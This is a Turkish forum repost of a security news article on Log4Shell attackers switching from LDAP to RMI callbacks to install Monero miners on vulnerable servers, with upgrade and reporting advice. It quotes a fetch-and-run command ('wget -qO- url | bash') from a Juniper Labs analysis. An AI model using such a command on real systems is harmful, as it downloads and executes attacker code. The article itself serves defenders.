Kaydol

Merhaba Sevgili Floodlar.com Kullanıcısı, Web sitemizde geçirdiğiniz zaman ve bu büyüleyici flood evrenine katılımınız için teşekkür ederiz. Floodların geniş dünyasıyla dolu deneyiminizi daha fazla keşfetmek için, web sitemizi sınırsız olarak kullanabilmeniz adına giriş yapmanız gerekmektedir.

Oturum aç

Merhaba Floodlar.com Kullanıcısı, İlk üç sayfayı tamamladınız, tebrikler! Ancak, floodların devamını görmek ve daha fazla interaktif deneyim yaşamak için giriş yapmanız gerekiyor. Hesabınız yoksa, hızlıca oluşturabilirsiniz. Sınırsız floodlar ve etkileşimler sizleri bekliyor. Giriş yapmayı unutmayın!

Şifremi hatırlamıyorum

Şifreniz mi unuttunuz? Endişelenmeyin! Lütfen kayıtlı e-posta adresinizi giriniz. Size bir bağlantı göndereceğiz ve bu link üzerinden yeni bir şifre oluşturabileceksiniz.

Fil Necati Masonlar Locası Subreddit Adı Nedir? Cevap: ( N31 )

Üzgünüz, flood girme izniniz yok, Flood girmek için giriş yapmalısınız.

Lütfen bu Floodun neden bildirilmesi gerektiğini düşündüğünüzü kısaca açıklayın.

Lütfen bu cevabın neden bildirilmesi gerektiğini kısaca açıklayın.

Lütfen bu kullanıcının neden rapor edilmesi gerektiğini düşündüğünüzü kısaca açıklayın.

Mobil Uygulamada Açın

Güncel Floodlar En sonuncu Nesne

Log4j saldırganları, RMI aracılığıyla Monero madencilerine enjekte etmeye geçiyor

Log4j saldırganları, RMI aracılığıyla Monero madencilerine enjekte etmeye geçiyor

Apache Log4j güvenlik açığından yararlanan bazı tehdit aktörleri, maksimum başarı şansı için LDAP geri arama URL’lerinden RMI’ye geçti veya hatta her ikisini de tek bir istekte kullandı.

Bu değişim, devam eden saldırıda dikkate değer bir gelişmedir ve savunucuların tüm potansiyel vektörleri güvence altına almaya çalışırken farkında olmaları gereken bir gelişmedir.

Şimdilik bu eğilim, Monero madenciliği için kaynakları ele geçirmek isteyen tehdit aktörleri tarafından gözlemlendi, ancak diğerleri bunu her an benimseyebilirler.

LDAP’den RMI’ye

Log4j “Log4Shell” güvenlik açığını hedefleyen saldırıların çoğu, LDAP (Hafif Dizin Erişim Protokolü) hizmeti aracılığıyla yapılmıştır.

RMI (Uzaktan Yöntem Çağırma) API’sine geçiş, bu mekanizmanın ek kontrollere ve kısıtlamalara tabi olduğu göz önüne alındığında, ilk başta sezgisel görünebilir, ancak durum her zaman böyle değildir.

Bazı JVM (Java Sanal Makinesi) sürümleri katı ilkeler içermez ve bu nedenle RMI, bazen RCE’ye (uzaktan kod yürütme) ulaşmak için LDAP’ye göre daha zahmetsiz bir kanal olabilir.

Ayrıca, LDAP talepleri artık enfeksiyon zincirinin bir parçası olarak katılaştırılıyor ve savunucular tarafından daha sıkı bir şekilde izleniyor.

Örneğin, birçok IDS/IPS aracı şu anda istekleri JNDI ve LDAP ile filtreliyor, dolayısıyla bu noktada RMI’nin göz ardı edilme olasılığı var.

Savunmasız hedeflere gönderilen gönderi isteği
Savunmasız hedeflere gönderilen gönderi isteği
Kaynak: Juniper Labs

Bazı durumlarda Juniper, aynı HTTP POST isteğinde hem RMI hem de LDAP hizmetlerini gördü.

Ancak, Log4Shell güvenlik açığını kötüye kullanmaya çalışan tüm aktörler için amaç aynı kalır – savunmasız Log4j sunucusu tarafından işlenecek bir istismar dizesi göndererek hedefte kod yürütülmesine yol açar.

Yukarıdaki saldırı, uzak bir sunucudan bir kabuk komut dosyası indiren bir bash kabuğunun oluşturulmasına neden olur.

“Bu kod, indirilen komut dosyasını yürütmek için “$@|bash” yapısını kullanarak JavaScript komut dosyası motoru aracılığıyla bir bash kabuğu komutu çağırır”, diye açıklıyor. Juniper Labs raporu

“Bu komutun yürütülmesi sırasında, bash kabuğu, saldırganın komutlarını başka bir bash işlemine iletir: “wget ​​-qO- url | bash”, hedef makinede bir kabuk betiği indirir ve yürütür.”

Para kazanmak için kaynakları ele geçirmek

Juniper Labs tarafından görülen saldırılarda, tehdit aktörleri, güvenliği ihlal edilmiş sunucularda Monero madenciliği yapmakla ilgileniyor ve bunu “başka kimseye zarar vermeyecek” neredeyse zararsız bir etkinlik olarak sunuyor.

İndirilen kabuk komut dosyasında mesaj bulundu
İndirilen kabuk komut dosyasında aktör mesajı bulundu
Kaynak: Juniper Labs

Madenci, x84_64 Linux sistemlerini hedefler ve cron alt sistemi aracılığıyla kalıcılık ekler.

Şimdiye kadarki saldırıların çoğu Linux sistemlerini hedef almış olsa da, CheckPoint raporları analistlerinin, ‘StealthLoader’ adlı Log4Shell’den yararlanan ilk Win32 yürütülebilir dosyasını keşfettiğini söyledi.

Bul, güncelle, rapor et

Yakın tarihteki en etkili güvenlik açıklarından biri haline gelene karşı savunmanın tek uygulanabilir yolu Log4j’yi şuna yükseltmektir: sürüm 2.16.0.

Ek olarak, yöneticiler yeni sürüm duyuruları için Apache’nin güvenlik bölümünü yakından takip etmeli ve hemen uygulamalıdır.

Azaltma rehberliği ve eksiksiz teknik bilgi kaynakları için bkz. CISA’nın ayrıntılı sayfası Log4Shell’de.

bir geniş ürün listesi CVE-2021-44228’den etkilenir ve satıcı tarafından sağlanan tavsiyeleri içeren bir liste sürekli olarak güncellenir. bu GitHub deposu.

Son olarak, sistemlerinizde şüpheli bir etkinlik fark ederseniz, bunu ilgili kuruluşa bildirmeyi düşünün. FBI veya CISA, hasarı kontrol altına almak ve durumu düzeltmek için hararetle çalışan.

İlgili Mesajlar

Yorum eklemek için giriş yapmalısınız.